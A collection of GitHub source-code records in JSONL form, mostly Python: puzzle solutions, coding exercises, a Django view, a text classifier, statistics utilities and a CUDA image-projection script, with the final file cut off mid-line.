+{"seq_id":"42788626590","text":"#Goal: collect all events of unauthorized traffic over the network\n\n# # import csv module\nimport csv\n\n# # name and open the employee and access CSV files\n# # create a csv reader object and print\n\n# #Sample\n# # with open('employees.csv') as employees_csv:\n# # csv_emp_reader = csv.DictReader(employees_csv)\n# # for employee in csv_emp_reader:\n# # print(employee['id'], employee['first_name'] ,employee['last_name'], employee['email'], employee['ip_address'])\n\nwith open('access_list.csv') as access_csv, open('employees.csv') as employees_csv:\n csv_access_reader = csv.DictReader(access_csv)\n csv_emp_reader = csv.DictReader(employees_csv)\n\n both = {a[0] for a in csv_access_reader} and {a[4] for a in csv_emp_reader}\n for access in csv_access_reader:\n if access[0] not in both:\n print(access)\n\n\n","repo_name":"dforbeck/PythonFundamentals","sub_path":"challenge_csv.py","file_name":"challenge_csv.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12474812278","text":"lines = [] \nwith open('day07input.txt', 'r') as inpfile:\n while True:\n line = inpfile.readline().strip()\n if line == '':\n break\n lines.append(line)\n\nvalues = {}\n \n\ndef getvalue(id, depth):\n global values\n margin = depth*' '\n depth = depth + 1\n try:\n result = values[id]\n return result\n except:\n pass\n try:\n result = int(id)\n except:\n result = -1\n if not result == -1:\n print(margin,'Found', id, 'value:', result)\n values[id] = result\n print(values)\n return result\n keyline = ''\n for line in lines:\n if line.split('->')[-1].strip() == id:\n keyline = line.split('->')[0].strip()\n print(margin, 'For', id, 'found instruction line', line)\n break\n if keyline == '':\n print('Error! No line found for', id)\n input()\n \n if len(keyline.split()) == 1:\n sid = keyline.split()[0]\n result = getvalue(sid, depth)\n print(margin, 'Found', id, 'value:', result)\n values[id] = result\n return getvalue(sid, depth)\n \n if keyline.split()[0] == 'NOT':\n sid = keyline.split()[1]\n result = 65535 - getvalue(sid, depth)\n print(margin,'Found', id, 'value:', result)\n values[id] = result\n return result\n\n if keyline.split()[1] == 'OR':\n sid1 = keyline.split()[0]\n sid2 = keyline.split()[2]\n result = getvalue(sid1, depth) | getvalue(sid2, depth)\n print(margin, 'Found', id, 'value:', result)\n values[id] = result\n return result\n \n if keyline.split()[1] == 'AND':\n sid1 = keyline.split()[0]\n sid2 = keyline.split()[2]\n result = getvalue(sid1, depth) & getvalue(sid2, depth)\n print(margin, 'Found', id, 'value:', result)\n values[id] = result\n return result\n \n if keyline.split()[1] == 'LSHIFT':\n sid = keyline.split()[0]\n i = int(keyline.split()[2])\n result = getvalue(sid, depth) << i\n print(margin,'Found', id, 'value:', result)\n values[id] = result\n return result\n\n if keyline.split()[1] == 'RSHIFT':\n sid = keyline.split()[0]\n i = int(keyline.split()[2])\n result = getvalue(sid, depth) >> i\n print(margin, 'Found', id, 'value:', result)\n values[id] = result\n return result \n\na = getvalue('a', 0)\n\nprint('a value is:', a)\ninput()\n\nvalues = {'b': a}\n\na = getvalue('a', 0)\n\nprint('New a value is:', a)\ninput()\n","repo_name":"aldragon-net/AoC","sub_path":"2015/day07-2015/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6846312766","text":"#reverseList - Write a function that reverses the values in the list (without creating a temporary array).\ndef reverseList(numbers):\n for i in range(int((len(numbers)-1)/2)):\n numbers[i],numbers[len(numbers)-1-i]=numbers[len(numbers)-1-i],numbers[i]\n print(numbers)\n\nreverseList([5,3,1,4])\n\n#isPalindrome - Write a function that checks whether the given word is a palindrome (a word that spells the same backward)\nword = \"Madam\"\n\nword_lower = word.lower().replace(\" \", \"\")\n\nif word_lower == word_lower[::-1]:\n print(\"It's a palindrome\")\nelse:\n print(\"This is not a palindrome\")\n\n#coins - Write a function that determines how many quarters, dimes, nickels, and pennies to give to a customer for a change where you minimize the number of coins you give out.\ndef Coins(coin):\n change=[]\n change.append(coin//25)\n change.append((coin%25)//10)\n change.append(((coin%25)%10)//5)\n change.append(((coin%25)%10)%5)\n print(change)\n\nCoins(102)\n\n\n\n","repo_name":"melonijanice/Python_Learning","sub_path":"_python/Python_Fundamentals/TDD/Algos.py","file_name":"Algos.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35680923107","text":"#\n# @lc app=leetcode id=662 lang=python3\n#\n# [662] Maximum Width of Binary Tree\n#\nfrom typing import Optional\nfrom collections import deque\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n# BFS\nclass Solution:\n def widthOfBinaryTree(self, root: Optional[TreeNode]) -> int:\n q = deque([(root, 0, 0)])\n curLevel = left = ans = 0\n while q:\n (node, level, pos) = q.pop()\n if node.left:\n q.appendleft((node.left, level + 1, pos * 2))\n if node.right:\n q.appendleft((node.right, level + 1, pos * 2 + 1))\n if curLevel != level:\n curLevel = level\n left = pos\n ans = max(ans, pos - left + 1)\n return ans\n# @lc code=end\n# DFS\n# class Solution:\n# def widthOfBinaryTree(self, root: Optional[TreeNode]) -> int:\n# left = {}\n# self.ans = 0\n# def dfs(node, level, pos):\n# if not node: return\n# if level not in left: left[level] = pos\n# self.ans = max(self.ans, pos - left[level] + 1)\n# dfs(node.left, level + 1, pos * 2)\n# dfs(node.right, level + 1, pos * 2 + 1)\n# dfs(root, 0, 0)\n# return self.ans\n\n","repo_name":"kranzCh/LeetcodePy","sub_path":"Solutions/662.maximum-width-of-binary-tree.py","file_name":"662.maximum-width-of-binary-tree.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73907653655","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import RegistrationForm\n\n# Create your views here.\n\ndef register(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST, request.FILES)\n if form.is_valid():\n user = form.save()\n # Perform any additional actions\n return HttpResponse('registration_success')\n else:\n form = RegistrationForm()\n \n return render(request, 'register.html', {'form': form})","repo_name":"hridesh-net/graphicalpassword","sub_path":"graphpass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21423559901","text":"cubes = {tuple(map(int,l.split(','))) for l in open('18.txt')}\nsides = lambda x,y,z: {(x+1,y,z),(x-1,y,z),(x,y+1,z),(x,y-1,z),(x,y,z+1),(x,y,z-1)}\n\n# determine grid boundaries\nmin_c, max_c = float('inf'), float('-inf')\nfor x, y, z in cubes:\n min_c = min(min_c, x, y, z)\n max_c = max(max_c, x, y, z)\nmin_c -= 1\nmax_c += 1\n\nseen = set()\ntodo = [(min_c, min_c, min_c)]\n# flood fill, keep track of faces seen\nwhile todo:\n here = todo.pop()\n for s in (sides(*here) - cubes - seen):\n if all(min_c <= c <= max_c for c in s):\n todo.append(s)\n seen |= {here}\n\n# for the cubes, sum all faces seen by the flood fill\nres = 0 \nfor c in cubes:\n for s in sides(*c):\n if s in seen: res += 1\n\nprint(res)","repo_name":"MelvinMallari/Advent-of-Code-2022-","sub_path":"18/18_2.py","file_name":"18_2.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38415816455","text":"# Jonathan Chen, 20722167\n# University of Waterloo\n# February 11, 2022\n\nimport re \nimport pickle\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pickle\nimport os\nimport numpy as np\nimport warnings\nimport sys\n\ndef read_files(file_name, isLabel):\n # Read data from files into a list\n lines = []\n with open(file_name) as file:\n for line in file:\n string = re.sub(\"[\\\"\\n]\", \"\", line)\n if isLabel:\n lines.append(int(string))\n else:\n lines.append(string)\n \n return lines\n\ndef create_text_vectors(feature, train, val, test):\n # Transform the dataset into n-grams\n if feature == \"unigrams\":\n count_vect = CountVectorizer(ngram_range=(1,1))\n elif feature == \"bigrams\":\n count_vect = CountVectorizer(ngram_range=(2,2))\n elif feature == \"unigrams+bigrams\":\n count_vect = CountVectorizer(ngram_range=(1,2))\n else:\n print(\"Unable to create text vectors\")\n exit(1)\n \n X_train = count_vect.fit_transform(train)\n X_val = count_vect.transform(val)\n X_test = count_vect.transform(test)\n\n return X_train, X_val, X_test, count_vect\n\ndef train_model(X_train, X_val, train_labels, val_labels):\n # INITIAL PARAMETER SEARCH\n # alpha_range = [0, 0.5, 1, 2, 5, 10, 25, 50, 100]\n\n # SECOND PARAMETER SEARCH\n alpha_range = np.linspace(0, 1.5, 16)\n\n best_alpha = 0\n best_accuracy = 0\n\n for alpha in alpha_range:\n clf = MultinomialNB(alpha=alpha)\n clf.fit(X_train, train_labels)\n Y_pred = clf.predict(X_val)\n if (accuracy_score(val_labels, Y_pred) > best_accuracy):\n best_accuracy = accuracy_score(val_labels, Y_pred)\n best_alpha = alpha\n \n best_model = MultinomialNB(alpha=best_alpha)\n best_model.fit(X_train, train_labels)\n return best_model\n\ndef test_model(clf, X_test, test_labels, model):\n Y_pred = clf.predict(X_test)\n\n print(model + \": Accuracy Score is \" + str(accuracy_score(test_labels, Y_pred)))\n\ndef run_models(train, val, test, train_ns, val_ns, test_ns, train_labels, val_labels, test_labels):\n models = ['unigrams stopwords', 'bigrams stopwords', 'unigrams+bigrams stopwords',\n 'unigrams no stopwords', 'bigrams no stopwords', 'unigrams+bigrams no stopwords']\n \n output_filenames = ['mnb_uni.pkl', 'mnb_bi.pkl', 'mnb_uni_bi.pkl', 'mnb_uni_ns.pkl', 'mnb_bi_ns.pkl', 'mnb_uni_bi_ns.pkl']\n\n if not os.path.exists(\"data\"):\n os.makedirs(\"data\")\n\n for i, model in enumerate(models):\n # Train the models with stopwords\n if model.split(\" \")[1] == 'stopwords':\n X_train, X_val, X_test, text_vectors = create_text_vectors(model.split(\" \")[0], train, val, test)\n best_model = train_model(X_train, X_val, train_labels, val_labels)\n \n test_model(best_model, X_test, test_labels, model)\n else:\n # Train the models without stopwords\n X_train, X_val, X_test, text_vectors = create_text_vectors(model.split(\" \")[0], train_ns, val_ns, test_ns)\n best_model = train_model(X_train, X_val, train_labels, val_labels)\n \n test_model(best_model, X_test, test_labels, model)\n \n # Save the model to a pickle\n model_pkl = open(\"data/\" + output_filenames[i], \"wb\")\n pickle.dump([text_vectors, best_model], model_pkl)\n model_pkl.close()\n\ndef main(file_path):\n # Read in the input files\n train = read_files(file_path+\"/train.csv\", False)\n val = read_files(file_path + \"/val.csv\", False)\n test = read_files(file_path+\"/test.csv\", False)\n \n train_ns = read_files(file_path+\"/train_ns.csv\", False)\n val_ns = read_files(file_path + \"/val_ns.csv\", False)\n test_ns = read_files(file_path+\"/test_ns.csv\", False)\n\n train_labels = read_files(file_path+\"/train_labels.csv\", True)\n val_labels = read_files(file_path+\"/val_labels.csv\", True)\n test_labels = read_files(file_path+\"/test_labels.csv\", True)\n\n run_models(train, val, test, train_ns, val_ns, test_ns, train_labels, val_labels, test_labels)\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"ERROR: Invalid number of inputs\")\n exit(1)\n\n input_folder_path = sys.argv[1]\n\n warnings.filterwarnings(\"ignore\")\n main(input_folder_path)\n","repo_name":"jonchen99/msci-nlp-w22","sub_path":"Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9739396949","text":"import sys\nimport threading\nimport time\nimport unittest\nimport yaml\nimport sleekxmpp\n\nfrom pdb import set_trace\nfrom microblog.bot import Bot\nfrom microblog import db\n\n_bot = None\n\n\nclass TestCase(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n global _bot\n super(TestCase, self).__init__(*args, **kwargs)\n\n self.cfg = yaml.load(open(sys.argv[1]).read())\n db.init(self.cfg['database'])\n _bot = Bot(**self.cfg['component'])\n\n threading.Thread(target = _bot.start).start()\n\n\n def test_send_message(self):\n client = sleekxmpp.ClientXMPP('user2@coolananas.com.au', 'user2password')\n client.connect((self.cfg['component']['server'], self.cfg['component']['port']))\n client.sendMessage('user1@coolbananas.com.au', 'test')\n self.assertEqual(True, False)\n\n\n\nif __name__ == '__main__':\n try:\n unittest.main(argv = sys.argv[:1])\n finally:\n time.sleep(1)\n if _bot is not None:\n _bot.stop()\n\n","repo_name":"cleartext/ximpp-server","sub_path":"tests/testsuite.py","file_name":"testsuite.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27695776411","text":"from widgets.widgets import QuestionDialog\nimport functools\nfrom gi.repository.Gdk import Cursor\n\ndef exc_try(func):\n \"\"\"Print the runtime of the decorated function\"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n try:\n func(*args, **kwargs)\n args[0].emit('updated','Done', 1)\n except Exception as e:\n args[0].emit('updated',str(e), 0)\n\n return wrapper\n\ndef check_dialog(func):\n \"\"\"Print the runtime of the decorated function\"\"\"\n @functools.wraps(func)\n def wrapper(widget, *args, **kwargs):\n dialog = QuestionDialog(widget, \"\")\n response = dialog.run()\n\n if response == -8:#Gtk.ResponseType.YES\n func(widget, *args, **kwargs)\n elif response == -9:pass #Gtk.ResponseType.NO\n dialog.destroy()\n return wrapper\n\ndef wait(func):\n \"\"\"Print the runtime of the decorated function\"\"\"\n @functools.wraps(func)\n def wrapper(widget, *args, **kwargs):\n display = widget.get_display()\n cursor = Cursor.new_from_name(display, 'wait')\n cursor_d = Cursor.new_from_name(display, 'default')\n\n toplevel = widget.get_toplevel()\n window = toplevel.get_window()\n window.set_cursor(cursor)\n\n def finish_cb():\n window.set_cursor(cursor_d)\n\n func(widget, *args, finish_cb, **kwargs)\n return wrapper\n","repo_name":"kiwinaut/tagger","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"17537553678","text":"__author__ = 'Matteo'\n__doc__='''This script combines the multiple pickled blast hits.'''\n\nimport csv\nimport pickle\nfrom Bio import SeqIO\nfrom Bio import Entrez\nmegageneball={}\nminigeneball={}\nstrains={}\nqueries=['fpvA1','fpvA2','fpvA3']\nfor q in queries:\n file=open(q+'_pickled.dat','rb')\n geneball=pickle.load(file)\n for strain in geneball.keys():\n #megageneball.setdefault(strain, []).extend(geneball[strain])\n if not strain in minigeneball.keys():\n minigeneball[strain]=[geneball[strain][0]]\n#print(len(megageneball))\nfile=open('fpvA_pickled.dat','wb')\npickle.dump(minigeneball,file)\n\n###PART A. download all matches.\n###PART B. gene clean-up. delete small matches. delete low similarity matches\n###PART C. gene numbers per strain\n###PART D. fasta of common.","repo_name":"matteoferla/pyoverdine","sub_path":"pyo_combiner.py","file_name":"pyo_combiner.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10688410116","text":"from .pggeotec_utilities import utilsFunctions as utils\nfrom scipy.stats import skew, spearmanr, pearsonr, kurtosis, variation, probplot, linregress\nfrom numpy import mean, std, amin, median, amax, var, percentile, sort, arange\n\n\nclass statFunctions:\n def statisticsDescritive(layer, fieldName, useSelection):\n try:\n statistics = {'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n statistics['mean'] = round(mean(resultData),2)\n statistics['stddev'] = round(std(resultData),2)\n statistics['median'] = round(median(resultData),2)\n statistics['minimun'] = round(amin(resultData),2)\n statistics['maximum'] = round(amax(resultData),2)\n statistics['variance'] = round(var(resultData),2)\n statistics['skewness'] = round(skew(resultData),2)\n statistics['kurtosis'] = round(kurtosis(resultData),2)\n statistics['cv'] = round(variation(resultData),2)\n statistics['upper_quartile'] = round(percentile(resultData, 75),2)\n statistics['lower_quartile'] = round(percentile(resultData, 25),2)\n statistics['count'] = len(resultData)\n return statistics\n except (Exception) as error:\n print('Check function statisticsDescritive. Cannot execute function. Reason %s' % (error)) \n \n def correlationAnalysis(layer, fieldName1, fieldName2, useSelection):\n try:\n statistics1 = {'pearson': 0, 'spearman': 0, 'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n statistics2 = {'pearson': 0, 'spearman': 0, 'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n resultDataOne = utils.useSelectionOneVariable(layer, fieldName1, useSelection)\n resultDataTwo = utils.useSelectionOneVariable(layer, fieldName2, useSelection)\n resultDataOne, resultDataTwo = utils.checkEqualNumberTwoVariables(resultDataOne, resultDataTwo)\n statistics1['mean'] = round(mean(resultDataOne),2)\n statistics1['stddev'] = round(std(resultDataOne),2)\n statistics1['median'] = round(median(resultDataOne),2)\n statistics1['minimun'] = round(amin(resultDataOne),2)\n statistics1['maximum'] = round(amax(resultDataOne),2)\n statistics1['variance'] = round(var(resultDataOne),2)\n statistics1['skewness'] = round(skew(resultDataOne),2)\n statistics1['kurtosis'] = round(kurtosis(resultDataOne),2)\n statistics1['cv'] = round(variation(resultDataOne),2)\n statistics1['upper_quartile'] = round(percentile(resultDataOne, 75),2)\n statistics1['lower_quartile'] = round(percentile(resultDataOne, 25),2)\n statistics1['count'] = len(resultDataOne)\n statistics1['pearson'] = pearsonr(resultDataOne, resultDataTwo)\n statistics1['spearman'] = spearmanr(resultDataOne, resultDataTwo)\n statistics2['mean'] = round(mean(resultDataTwo),2)\n statistics2['stddev'] = round(std(resultDataTwo),2)\n statistics2['median'] = round(median(resultDataTwo),2)\n statistics2['minimun'] = round(amin(resultDataTwo),2)\n statistics2['maximum'] = round(amax(resultDataTwo),2)\n statistics2['variance'] = round(var(resultDataTwo),2)\n statistics2['skewness'] = round(skew(resultDataTwo),2)\n statistics2['kurtosis'] = round(kurtosis(resultDataTwo),2)\n statistics2['cv'] = round(variation(resultDataTwo),2)\n statistics2['upper_quartile'] = round(percentile(resultDataTwo, 75),2)\n statistics2['lower_quartile'] = round(percentile(resultDataTwo, 25),2)\n statistics2['count'] = len(resultDataTwo)\n statistics2['pearson'] = statistics1['pearson']\n statistics2['spearman'] = statistics1['spearman']\n return statistics1, statistics2, resultDataOne, resultDataTwo\n except (Exception) as error:\n print('Check function correlationAnalysis. Cannot execute function. Reason %s' % (error)) \n \n def qqPlotData(layer, fieldName, useSelection):\n try:\n resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n res = probplot(resultData, dist='norm', plot=None)\n osm , osr = res[0]\n slope, intercept, r = res[1]\n slope, intercept, r, prob, sterrest = linregress(osm, osr)\n [xmin, xmax, ymin, ymax] = [amin(osm), amax(osm), amin(osr), amax(osr)]\n [posx, posy] = [(xmin + 0.70 * (xmax - xmin)), (ymin + 0.01 * (ymax - ymin))]\n return posx, posy, osm , osr, slope, intercept, r\n except (Exception) as error:\n print('Check function qqPlotData. Cannot execute function. Reason %s' % (error))\n\n def ecdfData(layer, fieldName, useSelection):\n try:\n resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n x = sort(resultData)\n n = x.size\n y = (arange(1, n+1)) / n\n return (x,y)\n except (Exception) as error:\n print('Check function ecdfData. Cannot execute function. Reason %s' % (error)) \n \n def calculateGridValues (resultDataLatCk, resultDataLongCk, resultDataElevCk):\n try:\n xMax, xMin = amax(resultDataLatCk), amin(resultDataLatCk)\n yMax, yMin = amax(resultDataLongCk), amin(resultDataLongCk)\n zMax, zMin = amax(resultDataElevCk), amin(resultDataElevCk)\n return xMax, xMin, yMax, yMin, zMax, zMin\n except (Exception) as error:\n print('Check function calculateGridValues. Cannot execute function. Reason %s' % (error))\n\n","repo_name":"bro-geo/geotechnical-data-explorer","sub_path":"pggeotec_stat.py","file_name":"pggeotec_stat.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38613878525","text":"# Brute force calculation of MIP in spherical coordinates\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport re\nimport tifffile as tff\nfrom math import *\nimport itertools\nfrom timeit import default_timer as timer\nfrom numbapro import cuda, jit, float32, uint16, int16\nfrom track_util import readXMLAmat\n\ndef readStackImage(filename, sType = 'uint16'):\n with tff.TiffFile(filename) as tif:\n image = tif.asarray().astype(sType)\n size = image.shape\n \n return image, size\n\ndef rayPoints(center, theta, phi, r_max, n_points):\n\n r = float(r_max)/n_points*(np.arange(n_points) + 1)\n points = np.zeros((3, n_points))\n points[0,:] = center[0] + r*sin(theta)*cos(phi)\n points[1,:] = center[1] + r*sin(theta)*sin(phi)\n points[2,:] = center[2] + r*cos(theta)\n\n return r, points\n\ndef calcTrilinearWeights(x, y, z, size):\n ijk = [(), ]*8\n weight = [0, ]*8\n cnt = 0\n for i in [floor(x), ceil(x)]:\n for j in [floor(y), ceil(y)]:\n for k in [floor(z), ceil(z)]:\n ijk[cnt] = (k, i, j)\n if ((i < size[1]) and (j < size[2]) and (k < size[0])\n and (i >= 0) and (j >= 0) and (k >= 0)):\n weight[cnt] = (1 - abs(x-i))*(1 - abs(y-j))*(1 - abs(z-k))\n else:\n weight[cnt] = 0\n cnt += 1\n\n return ijk, weight\n\ndef calcRay(all_theta, all_phi, image, n_points, r_max, center, all_max_val, r_of_maxval):\n \n size = image.shape\n # iterate over all the angles to get projection\n cnt_theta = 0\n for theta in all_theta:\n cnt_phi = 0\n for phi in all_phi:\n # calculate all the points coordinates\n r, points = rayPoints(center, theta, phi, r_max, n_points)\n # iterate over all the r to get maximum\n max_val = 0\n r_aux = 0\n for cnt_point in range(n_points):\n point = points[:,cnt_point]\n # calculate trilinear interpolation\n ijk, weights = calcTrilinearWeights(point[0], point[1], point[2], size)\n val = 0\n for index, weight in zip(ijk, weights):\n if weight > 0:\n val += weight*image[index]\n # check if maximum\n if val > max_val:\n max_val = val\n r_aux = r[cnt_point]\n\n # write output\n if r_aux > 0:\n r_of_maxval[cnt_theta, cnt_phi] = r_aux\n all_max_val[cnt_theta, cnt_phi] = max_val\n\n # add counter for phi\n cnt_phi += 1\n\n # add counter for theta\n cnt_theta += 1\n\n@cuda.jit(argtypes = [float32[:], float32[:], uint16[:,:,:], float32[:], float32[:], float32[:,:], float32[:,:]])\ndef calcRay_CUDA(all_theta, all_phi, image, r, center, all_max_val, r_of_maxval):\n\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n bx = cuda.blockIdx.x\n by = cuda.blockIdx.y\n bw = cuda.blockDim.x\n bh = cuda.blockDim.y\n xim = tx + bx * bw\n yim = ty + by * bh\n\n xy_max = all_max_val.shape\n\n if (xim < xy_max[0]) and (yim < xy_max[0]):\n\n theta = all_theta[xim]\n phi = all_phi[yim]\n size = image.shape\n n_points = r.shape[0]\n\n max_val = 0\n r_aux = 0\n for cnt_point in range(n_points):\n x = center[0] + r[cnt_point]*sin(theta)*cos(phi)\n y = center[1] + r[cnt_point]*sin(theta)*sin(phi)\n z = center[2] + r[cnt_point]*cos(theta)\n val = 0\n for ii in range(2):\n i = int16(floor(x) if ii == 0 else ceil(x))\n w1 = x-i if x>i else i-x \n for jj in range(2):\n j = int16(floor(y) if jj == 0 else ceil(y))\n w2 = y-j if y>j else j-y \n for kk in range(2):\n k = int16(floor(z) if kk == 0 else ceil(z))\n w3 = z-k if z>k else k-z\n if ((i < size[1]) and (j < size[2]) and (k < size[0])\n and (i >= 0) and (j >= 0) and (k >= 0)):\n weight = (1 - w1)*(1 - w2)*(1 - w3)\n val += weight*image[k,i,j]\n\n # check if maximum\n if val > max_val:\n max_val = val\n scale = 16\n r_aux = x*x + y*y + scale*scale*z*z\n\n # write output\n r_of_maxval[xim, yim] = r_aux\n all_max_val[xim, yim] = max_val \n\n# Read the image\nimage_path = \"C:\\\\Users\\\\olimpio\\\\Documents\\\\data\\\\XY-point-5\\\\slices\\\\T00001\\\\T00001.tif\"\nimage, size = readStackImage(image_path)\n\ncenter = np.array([size[1]/2,size[2]/2,0], dtype = np.float32)\nr_max = np.amax(size)/2 + 2\n\nn_points = 50\nn_theta = 50\nn_phi = 50\n\nr = float(r_max)/n_points*(np.arange(n_points) + 1)\nr = r.astype(np.float32)\n\nall_theta = (pi/n_theta)*np.arange(n_theta, dtype = np.float32)\nall_phi = (2*pi/n_phi)*np.arange(n_phi, dtype = np.float32) - pi\n\ndt = all_theta[1]\ndp = all_phi[1]+pi\ndr = r[0]\n\nprint(dr, dt, dp)\nprint(r_max*dt, r_max*dp)\n\nr_of_maxval = np.zeros((n_theta, n_phi), dtype = np.float32)\nall_max_val = np.zeros((n_theta, n_phi), dtype = np.float32)\nall_max_valcomp = np.zeros((n_theta, n_phi), dtype = np.float32)\nr_of_maxvalcomp = np.zeros((n_theta, n_phi), dtype = np.float32)\n\n# s = timer()\n# calcRay(all_theta, all_phi, image, n_points, r_max, center, all_max_valcomp, r_of_maxval)\n# e = timer()\n# print(e-s)\n\n# pix_phi, pix_theta = np.meshgrid(np.array(all_phi), np.array(all_theta))\n# ax = plt.subplot(2,1,1)\n# ax.contourf(pix_phi, pix_theta, all_max_valcomp,\n# zorder = 0, cmap = cm.Greys_r)\n# ax.invert_yaxis()\n\n# ax = plt.subplot(2,1,2)\n# ax.contourf(pix_phi, pix_theta, r_of_maxvalcomp,\n# zorder = 0)\n# ax.invert_yaxis()\n\nnThreads = (16,16)\nnBlocks = (ceil(n_theta/nThreads[0]), ceil(n_phi/nThreads[1]))\nprint(nBlocks)\n\ndate = \"2015_6_22_15_33_43\"\nxml_path = \"D:\\\\image_software\\\\results\\\\GMEMtracking3D_\"+date+\"\\\\XML_finalResult_lht_bckgRm\\\\GMEMfinalResult_frame????.xml\"\n\n# CUDA call of the image\ns = timer()\nd_theta = cuda.to_device(all_theta)\nd_phi = cuda.to_device(all_phi)\nd_image = cuda.to_device(image)\nd_r = cuda.to_device(r)\nd_center = cuda.to_device(center)\nd_max_val = cuda.device_array_like(all_max_val)\nd_r_max = cuda.device_array_like(r_of_maxval)\ncalcRay_CUDA[nBlocks, nThreads](d_theta, d_phi, d_image, d_r, d_center, d_max_val, d_r_max)\nd_max_val.copy_to_host(all_max_val)\nd_r_max.copy_to_host(r_of_maxval)\ne = timer()\nprint(e-s)\n\nn_time = 10\npos = readXML(xml_path, n_time)\n\n# Calculate the points coordinates\npos_arr = np.asarray(pos[0][0:3])\nn_cells = pos_arr.shape[1]\nangles = np.zeros((3,n_cells))\nfor cell in range(n_cells):\n point = pos_arr[:,cell] - center\n if point[0] > 0:\n angles[1,cell] = atan(point[1]/point[0])\n else:\n adj = -pi if point[1] < 0 else pi \n angles[1,cell] = atan(point[1]/point[0]) + adj\n rho = sqrt(point[0]**2 + point[1]**2)\n angles[0,cell] = atan(rho/point[2])\n angles[2,cell] = sqrt(rho**2 + (16*point[2])**2)\n\npix_phi, pix_theta = np.meshgrid(np.array(all_phi), np.array(all_theta))\nax = plt.subplot(2,1,1)\nax.contourf(pix_phi, pix_theta, all_max_val-all_max_valcomp,\n zorder = 0, cmap = cm.Greys_r)\nax.scatter(angles[1,:], angles[0,:], c = angles[2,:], zorder = 1)\nax.invert_yaxis()\n\nax = plt.subplot(2,1,2)\nax.contourf(pix_phi, pix_theta, np.sqrt(r_of_maxval), \n zorder = 0)\nax.scatter(angles[1,:], angles[0,:], c = angles[2,:], zorder = 1)\nax.invert_yaxis()\nplt.show()\n\n\n\n","repo_name":"epolimpio/image_extraction","sub_path":"code_snaps/mip.py","file_name":"mip.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35764009007","text":"\"\"\"Helper functions to set random seeds.\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport os\n\ndef init_seeds(seed,envs=None):\n \"\"\"Sets random seed.\"\"\"\n seed = int(seed)\n if envs is not None:\n envs_seeds = np.random.SeedSequence(seed).generate_state(len(envs))\n for idx, env in enumerate(envs):\n env.seed(int(envs_seeds[idx]))\n np.random.seed(seed)\n tf.random.set_seed(seed)\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)","repo_name":"jqueeney/robust-safe-rl","sub_path":"robust_safe_rl/common/seeding.py","file_name":"seeding.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"26612085633","text":"import time\r\nimport os\r\nimport yaml\r\nimport json\r\n\r\nfilepath =\"/home/vinay/fsproject2/app/files\"\r\nclass delmain():\r\n \r\n counfile = os.path.join(filepath, \"counterfile.txt\")\r\n midfile = os.path.join(filepath, \"playermatch.txt\")\r\n indfile = os.path.join(filepath, \"playermatch_index.txt\")\r\n with open(counfile, \"r+\") as file:\r\n rstring = 